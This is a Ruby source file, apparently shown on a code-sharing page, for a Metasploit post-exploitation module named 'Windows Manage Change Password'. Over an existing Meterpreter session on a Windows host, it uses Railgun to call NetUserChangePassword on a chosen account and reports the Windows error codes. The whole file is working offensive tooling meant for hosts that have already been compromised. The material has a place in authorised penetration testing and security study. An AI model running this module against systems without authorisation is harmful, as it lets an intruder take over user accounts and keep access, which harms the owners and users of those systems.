Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Windows Manage Change Password',
13
        'Description' => %q{
14
          This module will attempt to change the password of the targeted account.
15
          The typical usage is to change a newly created account's password on a
16
          remote host to avoid the error, 'System error 1907 has occurred,' which
17
          is caused when the account policy enforces a password change before the
18
          next login.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Platform' => ['win'],
22
        'SessionTypes' => ['meterpreter'],
23
        'Author' => ['Ben Campbell'],
24
        'Compat' => {
25
          'Meterpreter' => {
26
            'Commands' => %w[
27
              stdapi_railgun_api
28
            ]
29
          }
30
        }
31
      )
32
    )
33

34
    register_options(
35
      [
36
        OptString.new('SMBDomain', [false, 'Domain or Host to change password on, if not set will use the current login domain', nil], fallbacks: ['DOMAIN']),
37
        OptString.new('SMBUser', [true, 'Username to change password of'], fallbacks: ['PASSWORD']),
38
        OptString.new('OLD_PASSWORD', [true, 'Original password' ]),
39
        OptString.new('NEW_PASSWORD', [true, 'New password' ]),
40
      ]
41
    )
42
  end
43

44
  def run
45
    unless client.railgun
46
      print_error('This module requires a native Windows payload that supports Railgun.')
47
      return
48
    end
49

50
    domain = datastore['SMBDomain']
51
    username = datastore['SMBUser']
52
    old_password = datastore['OLD_PASSWORD']
53
    new_password = datastore['NEW_PASSWORD']
54
    print_status("Changing #{domain}\\#{username} password to #{new_password}...")
55
    result = client.railgun.netapi32.NetUserChangePassword(
56
      domain,
57
      username,
58
      old_password,
59
      new_password
60
    )
61

62
    case result['return']
63
    when 0x05
64
      err_msg = 'ERROR_ACCESS_DENIED'
65
    when 0x56
66
      err_msg = 'ERROR_INVALID_PASSWORD'
67
    when 0x92f
68
      err_msg = 'NERR_InvalidComputer'
69
    when 0x8b2
70
      err_msg = 'NERR_NotPrimary'
71
    when 0x8ad
72
      err_msg = 'NERR_UserNotFound'
73
    when 0x8c5
74
      err_msg = 'NERR_PasswordTooShort'
75
    when 0
76
      print_good('Password change successful.')
77
    else
78
      err_msg = "unknown error code: #{result['return']}"
79
    end
80

81
    if err_msg
82
      print_error("Password change failed, #{err_msg}.")
83
    end
84
  end
85
end
86

87